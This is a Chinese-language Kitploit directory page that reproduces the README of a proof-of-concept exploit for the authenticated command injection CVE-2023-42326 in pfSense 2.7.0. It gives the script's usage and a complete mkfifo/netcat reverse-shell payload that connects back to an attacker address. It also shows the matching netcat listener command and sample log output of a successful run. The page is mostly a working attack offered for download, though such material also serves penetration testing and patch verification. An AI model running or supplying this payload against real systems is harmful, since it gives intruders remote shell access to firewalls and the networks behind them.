Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-42326 — 这是一个简单的POC,用于展示pfsense 2.7命令注入漏洞(CVE-2023-42326) | Kitploit
工具/GitHubGitHub/bl4ckarch/cve-2023-42326
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubbl4ckarch/cve-2023-42326

CVE-2023-42326

这是一个简单的POC,用于展示pfsense 2.7命令注入漏洞(CVE-2023-42326)

查看仓库
4951年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

pfSense 2.7.0 命令注入漏洞利用 (CVE-2023-42326)

此 Python 脚本是 pfSense 2.7.0 中命令注入漏洞(CVE-2023-42326)的概念验证(PoC)利用程序。该漏洞允许经过身份验证的攻击者通过 interfaces_gif_edit.php 和 interfaces_gre_edit.php 组件注入并执行任意命令。

功能特性

  • 利用模式选择(gif 或 gre),用于选择存在漏洞的组件。
  • 命令注入功能,能够运行任意 shell 命令。
  • Netcat 反弹 shell 处理,带自动线程管理。
  • 调试模式,增强请求数据的可见性。

前提条件

在运行脚本之前,请确保您具备:

  • 您的系统上安装了 Python 3.x。
  • 已安装所需的 Python 库:
    pip install requests beautifulsoup4 rich
    

使用方法

基本示例(命令注入)

此命令注入一条 shell 命令,用于创建回连到您机器的反弹 shell:

python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"
  • -u:用于 pfSense 管理员登录的用户名。
  • -p:用于 pfSense 管理员登录的密码。
  • --mode:利用模式(gif 或 gre)。
  • -t:pfSense 的目标 URL。
  • -c:要注入的 shell 命令。
  • -d:(可选)启用调试模式以查看原始响应数据。

反弹 Shell 示例

请确保您的机器上正在运行 Netcat 监听器:

nc -lvnp 80

然后,使用类似如下的反弹 shell 命令运行脚本:

python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"  --insecure(for https without valid ssl)

演示 GIF

  1. 登录 pfSense 并利用 GIF 接口

    演示 1 - GIF 接口

  2. 执行反弹 Shell

    演示 2 - 反弹 Shell

脚本选项

参数说明
-u用于 pfSense 管理员登录的用户名。
-p用于 pfSense 管理员登录的密码。
-t目标 pfSense URL/IP 地址(例如 http://10.101.1.1)。
--mode利用模式:gif(用于 interfaces_gif_edit.php)或 gre。
-c要注入到存在漏洞组件中的命令。
-d可选。启用调试模式以输出响应数据,便于查看。

示例输出

当利用成功运行时,您应该会看到类似如下的输出:

██████╗ ███████╗██████╗ ██╗    ██╗███╗   ██╗███╗   ███╗███████╗
██╔══██╗██╔════╝██╔══██╗██║    ██║████╗  ██║████╗ ████║██╔════╝
██████╔╝█████╗  ██████╔╝██║ █╗ ██║██╔██╗ ██║██╔████╔██║█████╗  
██╔═══╝ ██╔══╝  ██╔═══╝ ██║███╗██║██║╚██╗██║██║╚██╔╝██║██╔══╝  
██║     ██║     ██║     ╚███╔███╔╝██║ ╚████║██║ ╚═╝ ██║███████╗
╚═╝     ╚═╝     ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═╝     ╚═╝╚══════╝

Done with ❤️  by @bl4ckarch                                                            
[2024-10-24 03:57:59] [SUCCESS] Target http://10.101.1.1 is reachable
[2024-10-24 03:57:59] [INFO] Fetching CSRF token from: http://10.101.1.1/
[2024-10-24 03:57:59] [SUCCESS] CSRF token extracted successfully
[2024-10-24 03:57:59] [INFO] Sending GIF exploit request to http://10.101.1.1/interfaces_gif_edit.php
[2024-10-24 03:57:59] [SUCCESS] GIF Exploit sent successfully

注意事项

  • 权限要求:您必须拥有 pfSense 实例的有效管理员凭据。
  • 目标系统:此利用程序专门针对 pfSense 2.7.0。
  • 反弹 Shell:设置反弹 Shell 时,请确保您的防火墙设置允许指定端口上的传入连接。

调试模式

如果您想查看所发送请求的更多详细信息,可以在命令中添加 -d 来启用调试模式。这将输出响应数据,帮助您排查问题。

python3 exploit.py -u "admin" -p 'pfsense' --mode 'gif' -t http://10.101.1.1 -c "your_command_here" -d --insecure(for https without valid ssl)

故障排查

  • 确保目标系统可以访问。
  • 仔细检查用于登录的凭据。
  • 如有需要,使用 -d 标志获取更详细的日志。
下载工具